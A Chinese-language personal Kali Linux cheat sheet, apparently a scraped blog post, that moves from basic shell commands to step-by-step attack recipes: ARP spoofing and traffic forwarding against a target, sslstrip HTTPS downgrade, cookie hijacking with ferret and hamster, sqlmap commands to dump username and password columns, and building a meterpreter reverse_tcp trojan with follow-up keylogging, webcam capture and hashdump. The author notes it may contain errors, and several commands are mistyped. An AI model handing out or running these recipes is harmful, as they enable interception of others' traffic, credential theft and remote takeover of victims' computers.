kali help

Attention

这是我N久前学习kali时自己打的东西,不保证没有纰漏啊……

网址

kali:
https://www.herojd.com/forum.php?mod=viewthread&tid=34

网站破解:
目录:
https://www.herojd.com/forum.php?gid=50

Burpsuite:
https://www.herojd.com/forum.php?mod=viewthread&tid=25
https://www.herojd.com/forum.php?mod=viewthread&tid=24

部分常用指令

ls

显示目录(原dir)

rm

删除(就是remove嘛)

进入目录(这个和cmd一样)

cd

返回上级目录(在Windows中是cd/或cd..)

ifconfig

查看内网IP

cat

查看内容

vim 文件名
文档编辑器,不存在就新建
不保存,退出

  1. 按下ESC
  2. 按下shift+:
  3. 输入q!(不保存,退出的意思)

编辑

  1. 按i键
  2. 按ESC
  3. 按shift+:
  4. 按wq(保存,退出)

查找IP

fping -a -g 目标IP列表
-a显示是"活着"的目标
-b n 大量 ping 数据要发送,以字节为单位 (默认 56)
-f 文件读取列表中的目标是从一个文件 (-意味着 stdin) (仅当没有-g 指定)
-g 生成目标列表 (仅当没有-f 指定)
(指定的开始和结束 IP 在目标列表中,或提供一个 IP 子网掩码)
(如: fping -a -g 192.168.1.0 192.168.1.255 或 fping -a -g 192.168.1.0/24)

nmap -Ss 目标ip
查看目标IP开放端口
nmap -sP 192.168.0.*
把你网段里的所有主机都找出来

nmap -O 目标ip

断网攻击+流量转发

arpspoof -i 网卡 -t 目标IP 我的网关
使目标IP进入我的网卡

echo 1 >/proc/sys/net/ipv4/ip_forward
进行IP流量转发(意为把1赋给一个文件)

driftnet -i 网卡
获取经过本机网卡的图片

欺骗攻击(http/https)

ettercap
欺骗工具,DNS欺骗,流量嗅探等
ettercap -Tq -i 网卡
启动文本模式欺骗http
ps:!ettercap会执行上一次的ettercap执行代码
ps: ettercap会自动转发,无需再echo 1 >/proc/sys/net/ipv4/ip_forward,别转发两次

sslstrip
把https的链接还原成http(但是易出现证书错误,也有概率抓不到包)

最后,若不是明文,就到百度上去URL解码

会话劫持

利用cookies,直接登录。
wireshark
抓包
方法一
1、输入wireshark,选择网卡开始
2、等待目标IP登陆,等待网络延迟
3、当出现大量DNS记录后,点红色小方框暂停
4、file->save as(另存为)桌面->格式选择pcap(可能是第二个)现在可以关闭欺骗
5、终端进入到桌面,输入ferret指令
6、使用hamster指令
7、改代理服务器:浏览器的Edit->Preferences->Advanced->选Manual proxy configuration->修改IP与端口
8、访问第五行的IP:端口
9、会出现被欺骗IP的链接,点击。若未出现,则是没抓到包
10、在左边一栏查找可能是登录的网址(要有耐心哟(^U^)ノ~)
PS:优先找全域名的哟(^U^)ノ~
方法二
1、无需欺骗,输入ferret -i 网卡可获取所有网段IP
2、同时,删除hamster.txt,再同时使用hamster指令
3、改代理服务器
4、打开网页后,选adapters,输入网卡,点Submit Query
5、在对方浏览网页是,网页会实时更新
6、若无用,重新执行ferret和hamster指令,并等待ferret指令执行完毕
7、在左边一栏查找可能是登录的网址(要有耐心哟(^U^)ノ~)
PS:优先找全域名的哟(^U^)ノ~
方法三(关闭代理!!!)
1、直接打开cookies.jar(关闭代理!!!)
2、选择网卡开始
3、这时就已经在实时更新。当出现蓝色字体时,过一会点开
4、在中间一栏查找可能是登录的网址(要有耐心哟(^U^)ノ~)
5、觉得是可能的,就选中,点击Lead Demaln Cookies
6、会弹出一个浏览器窗口,耐心的等它加载(做一个黑客就是要有耐心!)

ferret
重新生成抓包后的文件
ferret -r 文件名.pcap
会把原来抓包的pcap文件重新生成为txt文件
ferret -i
网卡可获取所有网段IP
hamster
重放流量
直接输入,后把http端口改成3/4行括号里的端口,并且访问第五行的IP:端口

sqlmap渗透注sql

ASP网站

sqlmap -u 网址
检测是否存在注入并返回数据库的类型

sqlmap -u 网址 --table
猜解所有表名(耐性等待)

sqlmap -u 网址 --columns -T"user"
(columns)
猜列名
(user)
根据经验确定这是用户表

PHP网站

sqlmap -u 网址(加协议和双引号)
检测

sqlmap -u 网址(加协议和双引号) --is-dba
检测网站是否为dba权限

sqlmap -u 网址(加协议和双引号) --dbs
列出所有数据库

sqlmap -u 网址(加协议和双引号) --dba
列出所有数据库

sqlmap -u 网址(加协议和双引号) --current-db
查找自己的数据库

sqlmap -u 网址(加协议和双引号) --table-D"数据库名"
查询所有表名(根据数据库)

sqlmap -u 网址(加协议和双引号) --columns -T "上一步中可能是管理员的表名"-D"数据库名"
查询所有列

sqlmap -u 网址(加协议和双引号) --dump -C "username,password" -T "上一步中可能是管理员的表名"-D"数据库名"
查询所有列

Cookies注入
或许,在某些站的网址后加入and 1=2会有错误提示,那就是这个网站可用Cookies注入了
先尝试常规注入
sqlmap -u 网址(加协议和双引号)
检测(一般没用,会出现黄色的错误)

cookies检测
sqlmap -u 网址(加协议和双引号且不要id = ***) --cookies "id参数" --level 2
如果是cookies注入,就要把等级提升为level 2

sqlmap -u 网址(加协议和双引号且不要id = ***) --tables --cookies "id参数" --level 2
猜解(耐性等待哟(^U^)ノ~!)

msfconsole

输入即可启动(速度较慢)

show
显示所有漏洞

use exploit/windows/smb/ms08

msfpayload windows/meterpreter/reverse_tcp LHOST=本机ip LPORT=高端口 X > test.exe
生成木马

exploit/multi/handler
使用handler模块

set PAYLOAD windows/meterpreter/reverse_tcp
使用shellcode

set LHOST=本机ip
set LPORT=高端口
设置。。。

等待目标打开

sysinfo
目标主机信息

shell
获取目标主机shell

因为木马随时可能被结束进程
所以要注入进程

ps
查看目标主机进程

migrate 进程ID
注入进程(常用explorer.exe)

run vnc
远程桌面

文件管理
Download
下载文件
Edit
编辑文件
cat
查看文件
cd
切换目录
mkdir
创建文件
mv
移动文件
rm
删除文件
upload
上传文件
rmdir
删除文件夹

网络及系统操作
Arp
查看arp缓冲表
ifconfip
IP
Getproxy
获得代理
Netstat
查看端口连接
kill
杀死进程
ps
查看进程
reboot
重启电脑
reg
修改注册表
shell
获得shell
shutdown
关机
sysinfo
主机信息

用户操作及其他功能
enumedesktops
窗体
keyscan_start
键盘记录开始
keyscan_dump
键盘记录下载
keyscan_stop
键盘记录结束
uictl 关闭desable或开启enable mouse或keyboard
获得鼠标键盘控制权
record_mic
音频录制
webcan_chat
查看摄像头接口
webcan_list
查看摄像头列表
webcan_stream
摄像头获取
getsystem
获得高权限
hashdump
下载hash表

kali帮助的更多相关文章

  1. Kali对wifi的破解记录

    好记性不如烂笔头,记录一下. 我是在淘宝买的拓实N87,Kali可以识别,还行. 操作系统:Kali 开始吧. 查看一下网卡的接口.命令如下 airmon-ng 可以看出接口名称是wlan0mon. ...

  2. 逆天Kali带你游遍大江南北~安全之前人铺路!

    0.Linux基础学习(基本指令) http://www.cnblogs.com/dunitian/p/4822807.html 1.Kali安装到移动硬盘或者U盘中~Linux系列通用方法(包括An ...

  3. kali linux下的arp攻击

    这是我第一篇博客,写的不好请谅解 ____________________________(分割线)_______________________________ 在kali linux系统下自带工具 ...

  4. U盘安装Kali 出现cd-rom无法挂载 已解决

    用U盘安装Kali Linux的过程中,出现cd-rom无法挂载的现象,百度坑比啊,醉了.下面亲测成功 出现无法挂载后,选择执行shell 第一步:df -m此时会看到挂载信息,最下面的是/dev/* ...

  5. 1.Kali安装到移动硬盘或者U盘中~Linux系通用方法(包括Android)

    0.1.保证这个服务必须启动(虚拟机服务最好都启动) 0.2.看看U盘接口类型是否对应 1.安装第一步 2.安装第二步,选择kali镜像 3.设置存放位置(上面的名字无所谓,最后不会用它的,虚拟机只是 ...

  6. 3.Kali 1.0 / 2.0 安装中文输入法(谷歌pinyin + 其他)

    1.kali默认是没有中午输入法的,需要自己安装一下 2.首先我们先获取root权限 dnt@HackerKali:~$ su密码: 3.安装中文输入法(apt-get 指令不会的同学可以学习一下基础 ...

  7. 4.修改更新源sources.list,提高软件下载安装速度(提供Kali 2.0 更新源)

    1.切换到root用户(如果已经是root用户就直接看第二步) dnt@HackerKali:~$ su 密码: 2.用文本编辑器打开sources.list,手动添加下面的更新源 root@Hack ...

  8. ★Kali信息收集~ 1.Google Hacking + Github Hacking

    一.google hacking site site:cnblogs.com 毒逆天 intitle intitle:login allintitle allintitle:index of alli ...

  9. ★Kali信息收集~3.子域名系列

    ★3.1Netcraft :子域名查询  官网:http://searchdns.netcraft.com/ 输入要查询的域名,即可得知子域名 3.2Fierce :子域名查询 概述: fierce ...

  10. ★Kali信息收集~4.DNS系列

    ★.1host:DNS信息 参数: 一般情况下,host查找的是A,AAAA,和MX的记录 案例: DNS服务器查询  host -t ns 域名 A记录和MX记录查询  host 域名(host - ...

随机推荐

  1. 嗯 想写个demo 苦于没数据

    step 1: 来点数据: 各种数据 随你便了. step 2: 来个 服务端 step 3 : 客户端 调用

  2. vijos 小胖守皇宫

    点击打开题目 树形DP 显然会想到某个点放或不放守卫来定义状态,但在不放的情况下,需要分类讨论是父亲放还是一个儿子放,于是定义以下状态: f[root][0]表示自己不放,父亲也不放 f[root][ ...

  3. 在python开发工具PyCharm中搭建QtPy环境(详细)

    在python开发工具PyCharm中搭建QtPy环境(详细) 在Python的开发工具PyCharm中安装QtPy5(版本5):打开“File”——“Settings”——“Project Inte ...

  4. Git详解之其他系统结合

    前言 世界不是完美的.大多数时候,将所有接触到的项目全部转向 Git 是不可能的.有时我们不得不为某个项目使用其他的版本控制系统(VCS, Version Control System ),其中比较常 ...

  5. 缓存 ehcache

    只是用于自己记录,防止日后忘记,回看所用 第一步:配置ehcahe 缓存 <?xml version="1.0" encoding="UTF-8"?> ...

  6. apache 目录网站显示indexs

    Apache Options Indexes FollowSymLinks详解 第一种方法 <Directory "E:\myvirtualhost\localhost"&g ...

  7. openstack启动云主机的流程

    看一下openstack启动云主机的流程图 通过上图分析可以知道: 1. 用户使用Dashboard或者CLI 把认证信息通过REST请求发送给keystone进行认证.2. Keystone校验用户 ...

  8. 一个新实验:使用gRPC-Web从浏览器调用.NET gRPC服务

    今天给大家翻译一篇由ASP.NET首席开发工程师James Newton-King前几天发表的一篇博客,文中带来了一个实验性的产品gRPC-Web.大家可以点击文末的讨论帖进行相关反馈.我会在文章末尾 ...

  9. Altium Designer打印多块PCB到热转印纸上、拼板发给工厂

    接下来介绍的方法的优势有: 节省电脑性能(来自不同PCB文件的图案被放置时只在第1块会卡顿一小会儿,之后不再卡顿) 便于排版(拖放图案时绝不会改变图案内容,拖放图案时鼠标拖住的矩形框的尺寸与图案的尺寸 ...

  10. 使用递归函数用来输出n个元素的所有子集(数据结构、算法与应用)

    例如,三个元素的集合A = {a,b,c}的所有子集是:空集a,b,c,ab,ac,bc,abc,共八个 分析: 对于集合A中的每个元素,在其子集中都可能存在或者不存在,所以A的子集有23种. 可以设 ...